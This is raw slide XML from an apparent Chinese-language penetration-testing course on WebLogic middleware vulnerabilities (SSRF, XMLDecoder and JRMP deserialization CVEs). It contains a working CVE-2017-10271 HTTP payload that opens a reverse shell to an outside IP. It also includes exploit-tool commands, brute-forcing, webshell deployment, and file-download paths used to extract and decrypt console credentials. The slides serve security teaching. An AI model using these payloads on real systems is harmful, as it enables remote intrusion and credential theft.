              <a:t>所以它能够请求到与它相连而与外网隔离的内部系统）。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dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>中间件默认带有</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="165" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="165" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>UDDI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目录浏览器</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="840" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>且</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>为 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>未授权访问，通过该应用，可进行无回显的</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>请求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</a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="10" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>危害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837565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Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>攻击者可利用该漏洞对企业内网进行大规模扫描，了解内网结构，并可能结合内网漏洞直接获取服务器权限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sz="1600" spc="10" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>危害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688340" marR="5080" indent="149225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Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>攻击者可利用该漏洞对企业内网进行大规模扫描，了解内网结构，并可能结合内网漏洞直接获取服务器权限</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>。 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="10" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>解决方案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11455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Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>、删</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>除</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>uddiexplorer</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>文件</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>夹</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="11455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2</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>、限</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>制</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>uddiexplorer</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>应用只能内网访</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>问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-Weblogic XMLDecoder </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>反序列化漏洞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Weblogic &lt; 10.3.6 ‘wls-wsat’ XMLDecoder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反序列化漏洞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CVE-2017-10271</a:t>
            </a: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WLS Security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组件对外提供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服务，其中使用了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XMLDecoder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来解析用户传入的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数据，在解析的过程中出现反序列化漏洞，导致可执行任意命令。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传入下面的数据包即可反弹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3212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-Weblogic XMLDecoder </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>反序列化漏洞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矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="508507" y="1295400"/>
            <a:ext cx="10668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/>
              <a:t>POST /wls-wsat/CoordinatorPortType HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
              <a:t>Host: your-ip:7001</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
              <a:t>Accept-Encoding: gzip, deflate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
              <a:t>Accept: */*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
              <a:t>Accept-Language: en</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
              <a:t>User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
              <a:t>Connection: close</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
              <a:t>Content-Type: text/xml</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
              <a:t>Content-Length: 637</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
              <a:t>&lt;soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"&gt; &lt;soapenv:Header&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
              <a:t>&lt;work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
              <a:t>&lt;java version="1.4.0" class="java.beans.XMLDecoder"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
              <a:t>&lt;void class="java.lang.ProcessBuilder"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
              <a:t>&lt;array class="java.lang.String" length="3"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
              <a:t>&lt;void index="0"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
              <a:t>&lt;string&gt;/bin/bash&lt;/string&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
              <a:t>&lt;/void&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
              <a:t>&lt;void index="1"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
              <a:t>&lt;string&gt;-c&lt;/string&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
              <a:t>&lt;/void&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
              <a:t>&lt;void index="2"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
              <a:t>&lt;string&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bash -i &amp;gt;&amp;amp; /dev/tcp/13.94.33.143/8089 0&amp;gt;&amp;amp;1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
              <a:t>&lt;/string&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
              <a:t>&lt;/void&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
              <a:t>&lt;/array&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
              <a:t>&lt;void method="start"/&gt;&lt;/void&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
              <a:t>&lt;/java&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
              <a:t>&lt;/work:WorkContext&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
              <a:t>&lt;/soapenv:Header&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
              <a:t>&lt;soapenv:Body/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
              <a:t>&lt;/soapenv:Envelope&gt;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672923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 cve-2017-3248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分析之前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漏洞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CVE-2015-4852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的补丁，发现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采用黑名单的方式过滤危险的反序列化类。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但是这种修复方式很被动，存在被绕过的风险，只要发现可用并且未在黑名单之外的反序列化类，那么之前的防护就会被打破，系统遭受攻击。这次发布的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CVE-2017-3248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就是利用了黑名单之外的反序列化类，通过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JRMP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协议达到执行任意反序列化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payload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远程消息交换协议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JRMP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即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Remote MessagingProtocol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，是特定于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技术的、用于查找和引用远程对象的协议。这是运行在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远程方法调用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RMI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之下、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TCP/IP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之上的线路层协议。）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利用方法：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-jar weblogic_cmd.jar -H "202.112.51.134" -C "whoami"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779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b="1"/>
              <a:t>weblogic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>的其他反序列化漏洞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990600" y="2209800"/>
            <a:ext cx="103892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Oracle 2018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月补丁中，修复了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 Server WLS Core Components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中出现的一个反序列化漏洞（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CVE-2018-2628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），该漏洞通过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协议触发，可导致未授权的用户在远程服务器执行任意命令。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可参考：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http://mp.weixin.qq.com/s/nYY4zg2m2xsqT0GXa9pMGA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943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 cve-2017-3248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762000" y="1395010"/>
            <a:ext cx="10389286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CVE-2018-2628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kericwy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/CVE-2018-2628</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pP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CVE-2018-2893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CVE-2018-3191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10.3.6.0,12.1.3.0,12.2.1.3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  <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="6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CVE-2018-3197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12.1.3.0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CVE-2018-3201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12.2.1.3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CVE-2018-3245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10.3.6.0,12.1.3.0,12.2.1.3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#### CVE-2018-3252</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft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10.3.6.0,12.1.3.0,12.2.1.3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9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/>
              <a:t>中间件的分类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066800" y="1812695"/>
            <a:ext cx="1023688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0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2800"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2800"/>
              <a:t>中间件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-Hans" sz="2800"/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2800"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2400"/>
              <a:t>    功能：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-Hans" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="635000" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans"/>
              <a:t>	Nginx/Apache/IIS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US"/>
              <a:t>等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US"/>
              <a:t>服务不支持直接处理动态语言的请求，需要引入相应的模块才能正常解析。而</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US"/>
              <a:t>中间件提供了一些通用的模块，例如处理动态语言、发送邮件、数据库链接等。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-Han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0CD626E-4DFE-9542-BB60-2EFB7828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04" y="3953510"/>
            <a:ext cx="5558087" cy="29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5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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>常规渗透测试环境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867770" y="1662751"/>
            <a:ext cx="10389286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尝试爆破控制台弱口令：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python weblogic-weakpasswd.py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然而，在真实的环境下，可能是有锁定机制的，本环境中日志中就出现了：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User wlpisystem in security realm myrealm has had 5 invalid login attempts, locking account for 30 minutes.</a:t>
            </a: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获取弱口令后登录后台，部署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jsp.war,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之后访问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webshell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http://202.112.51.134:7001/jsp/jsp.jsp?cmd=whoami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162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90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/>
              <a:t>实验</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>常规渗透测试环境</a:t>
            </a:r>
            <a:endParaRPr b="1"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867770" y="1662751"/>
            <a:ext cx="103892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如果我们能够通过某种方式读到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的配置文件，我们可以从配置文件中解密出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控制台的账号密码。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例如，站点存在任意文件下载漏洞：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http://202.112.51.134:7001/hello/file.jsp?path=./config/config.xml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http://202.112.51.134:7001/hello/file.jsp?path=./security/SerializedSystemIni.dat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注意，后一个文件是一个二进制文件，要用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burp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进行访问，然后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copy to file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，这样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下来的文件才是对的。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解密密码：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Picture 4" descr="https://i.imgur.com/kGUeiy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963992"/>
            <a:ext cx="571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0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52276" y="3811270"/>
            <a:ext cx="840105" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="840104" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="839723" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="839723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970915" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="970915" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="970788" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97078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68713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反序列化漏洞对</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-90" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-40" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="5" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>og</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="5" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>的影响</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="970788" y="1857755"/>
            <a:ext cx="10381615" cy="832485"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10381615" h="832485">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10381488" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10381488" y="832104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="832104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6749" y="1853526"/>
            <a:ext cx="10390505" cy="840740"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10390505" h="840739">
                <a:moveTo>
                  <a:pt x="10385425" y="840524"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="840524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="840295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955" y="839622"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="838568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="837234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="835761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10385425" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10390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30999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="830999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="835761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10390187" y="835761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10389958" y="837234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10389285" y="838568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10388231" y="839622"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10386898" y="840295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10385425" y="840524"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10390505" h="8407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90505" h="840739">
                <a:moveTo>
                  <a:pt x="10380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80662" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10380662" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10390505" h="840739">
                <a:moveTo>
                  <a:pt x="10380662" y="835761"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10380662" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10385425" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10390187" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10390187" y="830999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10385425" y="830999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10380662" y="835761"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10390505" h="840739">
                <a:moveTo>
                  <a:pt x="10390187" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10385425" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10380662" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10390187" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10390187" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10390505" h="840739">
                <a:moveTo>
                  <a:pt x="9525" y="835761"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="830999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="830999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="835761"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10390505" h="840739">
                <a:moveTo>
                  <a:pt x="10380662" y="835761"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="835761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="830999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10380662" y="830999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10380662" y="835761"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10390505" h="840739">
                <a:moveTo>
                  <a:pt x="10390187" y="835761"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10380662" y="835761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10385425" y="830999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10390187" y="830999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10390187" y="83576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788" y="2799588"/>
            <a:ext cx="10381615" cy="1324610"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10381615" h="1324610">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10381488" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10381488" y="1324356"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="132435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6749" y="2795168"/>
            <a:ext cx="10390505" cy="1333500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10390505" h="1333500">
                <a:moveTo>
                  <a:pt x="10385425" y="1332966"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="1332966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="1332738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955" y="1332052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="1330998"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="1329677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10385425" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10390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10390187" y="1328204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10389958" y="1329677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10389285" y="1330998"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10388231" y="1332052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10386898" y="1332738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10385425" y="1332966"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10390505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90505" h="1333500">
                <a:moveTo>
                  <a:pt x="10380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80662" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10380662" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10390505" h="1333500">
                <a:moveTo>
                  <a:pt x="10380662" y="1328204"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10380662" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10385425" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10390187" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10390187" y="1323441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10385425" y="1323441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10380662" y="1328204"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10390505" h="1333500">
                <a:moveTo>
                  <a:pt x="10390187" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10385425" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10380662" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10390187" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10390187" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10390505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10390505" h="1333500">
                <a:moveTo>
                  <a:pt x="10380662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10380662" y="1323441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10380662" y="1328204"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10390505" h="1333500">
                <a:moveTo>
                  <a:pt x="10390187" y="1328204"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10380662" y="1328204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10385425" y="1323441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10390187" y="1323441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10390187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8680" y="1409509"/>
            <a:ext cx="10863720" cy="369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反序列化漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="18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  <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://paper.seebug.org/312/</a:t>
            </a:r>
